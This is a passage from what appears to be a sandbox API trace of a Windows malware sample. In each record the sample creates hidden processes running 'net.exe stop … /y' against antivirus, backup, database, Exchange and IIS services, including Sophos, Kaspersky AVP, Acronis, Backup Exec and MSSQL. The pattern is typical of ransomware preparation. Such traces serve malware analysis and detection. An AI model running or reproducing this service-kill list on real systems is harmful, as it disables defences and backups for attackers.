HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f05c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x470, hStdError=0x0), lpProcessInformation=0x22718e4 | out: lpCommandLine="\"net.exe\" stop AcrSch2Svc /y", lpProcessInformation=0x22718e4*(hProcess=0x3c8, hThread=0x3f8, dwProcessId=0x6d8, dwThreadId=0x5e8)) returned 1 [0103.163] CloseHandle (hObject=0x470) returned 1 [0103.163] GetFileType (hFile=0x43c) returned 0x3 [0103.163] CloseHandle (hObject=0x3f8) returned 1 [0105.293] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0105.293] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x3b4, hWritePipe=0x560f110*=0x448) returned 1 [0105.294] GetCurrentProcess () returned 0xffffffff [0105.294] GetCurrentProcess () returned 0xffffffff [0105.294] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3b4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x37c) returned 1 [0105.294] CloseHandle (hObject=0x3b4) returned 1 [0105.294] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0105.294] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0105.294] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0105.294] CoTaskMemFree (pv=0x741d20) [0105.294] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop AcronisAgent /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f05c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x448, hStdError=0x0), lpProcessInformation=0x227b1a0 | out: lpCommandLine="\"net.exe\" stop AcronisAgent /y", lpProcessInformation=0x227b1a0*(hProcess=0x46c, hThread=0x3b4, dwProcessId=0xea0, dwThreadId=0xe8c)) returned 1 [0105.588] CloseHandle (hObject=0x448) returned 1 [0105.588] GetFileType (hFile=0x37c) returned 0x3 [0105.588] CloseHandle (hObject=0x3b4) returned 1 [0106.311] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0106.311] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x448, hWritePipe=0x560f110*=0x47c) returned 1 [0106.311] GetCurrentProcess () returned 0xffffffff [0106.311] GetCurrentProcess () returned 0xffffffff [0106.311] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x448, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x478) returned 1 [0106.311] CloseHandle (hObject=0x448) returned 1 [0106.311] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0106.311] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0106.311] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0106.312] CoTaskMemFree (pv=0x741d20) [0106.312] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop CASAD2DWebSvc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f05c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x47c, hStdError=0x0), lpProcessInformation=0x23f40c4 | out: lpCommandLine="\"net.exe\" stop CASAD2DWebSvc /y", lpProcessInformation=0x23f40c4*(hProcess=0x494, hThread=0x448, dwProcessId=0x1004, dwThreadId=0x1008)) returned 1 [0106.347] CloseHandle (hObject=0x47c) returned 1 [0106.348] GetFileType (hFile=0x478) returned 0x3 [0106.348] CloseHandle (hObject=0x448) returned 1 [0107.124] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0107.124] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x47c, hWritePipe=0x560f110*=0x4e0) returned 1 [0107.125] GetCurrentProcess () returned 0xffffffff [0107.125] GetCurrentProcess () returned 0xffffffff [0107.125] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x47c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x4ec) returned 1 [0107.125] CloseHandle (hObject=0x47c) returned 1 [0107.125] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0107.125] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0107.125] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0107.125] CoTaskMemFree (pv=0x741d20) [0107.125] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop CAARCUpdateSvc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f05c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x4e0, hStdError=0x0), lpProcessInformation=0x241ece0 | out: lpCommandLine="\"net.exe\" stop CAARCUpdateSvc /y", lpProcessInformation=0x241ece0*(hProcess=0x4e8, hThread=0x47c, dwProcessId=0x10ac, dwThreadId=0x10b0)) returned 1 [0107.154] CloseHandle (hObject=0x4e0) returned 1 [0107.154] GetFileType (hFile=0x4ec) returned 0x3 [0107.154] CloseHandle (hObject=0x47c) returned 1 [0110.154] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0110.154] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x4f8, hWritePipe=0x560f110*=0x3e0) returned 1 [0110.154] GetCurrentProcess () returned 0xffffffff [0110.154] GetCurrentProcess () returned 0xffffffff [0110.154] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4f8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x460) returned 1 [0110.154] CloseHandle (hObject=0x4f8) returned 1 [0110.154] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0110.154] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0110.154] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0110.154] CoTaskMemFree (pv=0x741d20) [0110.155] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop sophos /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f05c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3e0, hStdError=0x0), lpProcessInformation=0x22724c4 | out: lpCommandLine="\"net.exe\" stop sophos /y", lpProcessInformation=0x22724c4*(hProcess=0x430, hThread=0x4f8, dwProcessId=0x1170, dwThreadId=0x1174)) returned 1 [0110.664] CloseHandle (hObject=0x3e0) returned 1 [0110.664] GetFileType (hFile=0x460) returned 0x3 [0110.664] CloseHandle (hObject=0x4f8) returned 1 [0112.190] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0112.190] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x4f8, hWritePipe=0x560f110*=0x3e0) returned 1 [0112.190] GetCurrentProcess () returned 0xffffffff [0112.190] GetCurrentProcess () returned 0xffffffff [0112.190] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4f8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x418) returned 1 [0112.190] CloseHandle (hObject=0x4f8) returned 1 [0112.190] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0112.190] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0112.190] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0112.190] CoTaskMemFree (pv=0x741d20) [0112.190] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop “Acronis VSS Provider” /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f04c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3e0, hStdError=0x0), lpProcessInformation=0x24c9230 | out: lpCommandLine="\"net.exe\" stop “Acronis VSS Provider” /y", lpProcessInformation=0x24c9230*(hProcess=0x2f4, hThread=0x4f8, dwProcessId=0x124c, dwThreadId=0x1250)) returned 1 [0112.556] CloseHandle (hObject=0x3e0) returned 1 [0112.556] GetFileType (hFile=0x418) returned 0x3 [0112.556] CloseHandle (hObject=0x4f8) returned 1 [0114.444] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0114.444] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x4a4, hWritePipe=0x560f110*=0x3e0) returned 1 [0114.445] GetCurrentProcess () returned 0xffffffff [0114.445] GetCurrentProcess () returned 0xffffffff [0114.445] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x4e0) returned 1 [0114.445] CloseHandle (hObject=0x4a4) returned 1 [0114.445] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0114.445] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0114.445] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0114.445] CoTaskMemFree (pv=0x741d20) [0114.445] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MsDtsServer /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f05c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3e0, hStdError=0x0), lpProcessInformation=0x22717a4 | out: lpCommandLine="\"net.exe\" stop MsDtsServer /y", lpProcessInformation=0x22717a4*(hProcess=0x3cc, hThread=0x4a4, dwProcessId=0x13a4, dwThreadId=0x13a8)) returned 1 [0114.681] CloseHandle (hObject=0x3e0) returned 1 [0114.681] GetFileType (hFile=0x4e0) returned 0x3 [0114.681] CloseHandle (hObject=0x4a4) returned 1 [0115.615] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0115.615] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x4a4, hWritePipe=0x560f110*=0x3e0) returned 1 [0115.616] GetCurrentProcess () returned 0xffffffff [0115.616] GetCurrentProcess () returned 0xffffffff [0115.616] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x2c4) returned 1 [0115.616] CloseHandle (hObject=0x4a4) returned 1 [0115.616] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0115.616] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0115.616] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0115.616] CoTaskMemFree (pv=0x741d20) [0115.616] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop IISAdmin /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f05c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3e0, hStdError=0x0), lpProcessInformation=0x2624d70 | out: lpCommandLine="\"net.exe\" stop IISAdmin /y", lpProcessInformation=0x2624d70*(hProcess=0x418, hThread=0x4a4, dwProcessId=0xca8, dwThreadId=0xcf8)) returned 1 [0115.901] CloseHandle (hObject=0x3e0) returned 1 [0115.901] GetFileType (hFile=0x2c4) returned 0x3 [0115.901] CloseHandle (hObject=0x4a4) returned 1 [0117.724] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0117.724] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x3e0, hWritePipe=0x560f110*=0x478) returned 1 [0117.724] GetCurrentProcess () returned 0xffffffff [0117.724] GetCurrentProcess () returned 0xffffffff [0117.724] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3e0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x464) returned 1 [0117.724] CloseHandle (hObject=0x3e0) returned 1 [0117.724] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0117.724] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0117.725] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0117.725] CoTaskMemFree (pv=0x741d20) [0117.725] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MSExchangeES /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f05c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x478, hStdError=0x0), lpProcessInformation=0x2271a68 | out: lpCommandLine="\"net.exe\" stop MSExchangeES /y", lpProcessInformation=0x2271a68*(hProcess=0x46c, hThread=0x3e0, dwProcessId=0xc68, dwThreadId=0xe10)) returned 1 [0117.735] CloseHandle (hObject=0x478) returned 1 [0117.735] GetFileType (hFile=0x464) returned 0x3 [0117.735] CloseHandle (hObject=0x3e0) returned 1 [0119.443] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0119.443] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x518, hWritePipe=0x560f110*=0x478) returned 1 [0119.443] GetCurrentProcess () returned 0xffffffff [0119.443] GetCurrentProcess () returned 0xffffffff [0119.443] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x518, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x530) returned 1 [0119.444] CloseHandle (hObject=0x518) returned 1 [0119.444] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0119.444] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0119.444] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0119.444] CoTaskMemFree (pv=0x741d20) [0119.444] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop “Sophos Agent” /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f05c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x478, hStdError=0x0), lpProcessInformation=0x2662920 | out: lpCommandLine="\"net.exe\" stop “Sophos Agent” /y", lpProcessInformation=0x2662920*(hProcess=0x52c, hThread=0x518, dwProcessId=0xe94, dwThreadId=0xe08)) returned 1 [0119.929] CloseHandle (hObject=0x478) returned 1 [0119.929] GetFileType (hFile=0x530) returned 0x3 [0119.929] CloseHandle (hObject=0x518) returned 1 [0120.723] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0120.723] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x518, hWritePipe=0x560f110*=0x478) returned 1 [0120.724] GetCurrentProcess () returned 0xffffffff [0120.724] GetCurrentProcess () returned 0xffffffff [0120.724] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x518, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x56c) returned 1 [0120.724] CloseHandle (hObject=0x518) returned 1 [0120.724] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0120.724] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0120.724] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0120.724] CoTaskMemFree (pv=0x741d20) [0120.724] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop EraserSvc11710 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f05c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x478, hStdError=0x0), lpProcessInformation=0x26910b0 | out: lpCommandLine="\"net.exe\" stop EraserSvc11710 /y", lpProcessInformation=0x26910b0*(hProcess=0x568, hThread=0x518, dwProcessId=0xdac, dwThreadId=0xf40)) returned 1 [0120.728] CloseHandle (hObject=0x478) returned 1 [0120.728] GetFileType (hFile=0x56c) returned 0x3 [0120.728] CloseHandle (hObject=0x518) returned 1 [0120.728] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0120.728] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x518, hWritePipe=0x560f110*=0x478) returned 1 [0120.728] GetCurrentProcess () returned 0xffffffff [0120.728] GetCurrentProcess () returned 0xffffffff [0120.728] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x518, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x574) returned 1 [0120.729] CloseHandle (hObject=0x518) returned 1 [0120.729] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0120.729] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0120.729] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0120.729] CoTaskMemFree (pv=0x741d20) [0120.729] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop AVP /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f05c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x478, hStdError=0x0), lpProcessInformation=0x26aa118 | out: lpCommandLine="\"net.exe\" stop AVP /y", lpProcessInformation=0x26aa118*(hProcess=0x570, hThread=0x518, dwProcessId=0x13e8, dwThreadId=0x115c)) returned 1 [0120.739] CloseHandle (hObject=0x478) returned 1 [0120.739] GetFileType (hFile=0x574) returned 0x3 [0120.739] CloseHandle (hObject=0x518) returned 1 [0120.739] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0120.739] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x518, hWritePipe=0x560f110*=0x478) returned 1 [0120.739] GetCurrentProcess () returned 0xffffffff [0120.739] GetCurrentProcess () returned 0xffffffff [0120.739] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x518, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x57c) returned 1 [0120.739] CloseHandle (hObject=0x518) returned 1 [0120.739] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0120.739] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0120.739] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0120.740] CoTaskMemFree (pv=0x741d20) [0120.740] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop BackupExecVSSProvider /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f04c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x478, hStdError=0x0), lpProcessInformation=0x26ad9d8 | out: lpCommandLine="\"net.exe\" stop BackupExecVSSProvider /y", lpProcessInformation=0x26ad9d8*(hProcess=0x578, hThread=0x518, dwProcessId=0xf68, dwThreadId=0x13e4)) returned 1 [0120.744] CloseHandle (hObject=0x478) returned 1 [0120.744] GetFileType (hFile=0x57c) returned 0x3 [0120.744] CloseHandle (hObject=0x518) returned 1 [0120.744] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0120.744] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x518, hWritePipe=0x560f110*=0x478) returned 1 [0120.744] GetCurrentProcess () returned 0xffffffff [0120.744] GetCurrentProcess () returned 0xffffffff [0120.744] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x518, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x584) returned 1 [0120.744] CloseHandle (hObject=0x518) returned 1 [0120.744] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0120.744] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0120.744] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0120.745] CoTaskMemFree (pv=0x741d20) [0120.745] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MSSQL$SHAREPOINT /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f058*(cb=0x44, 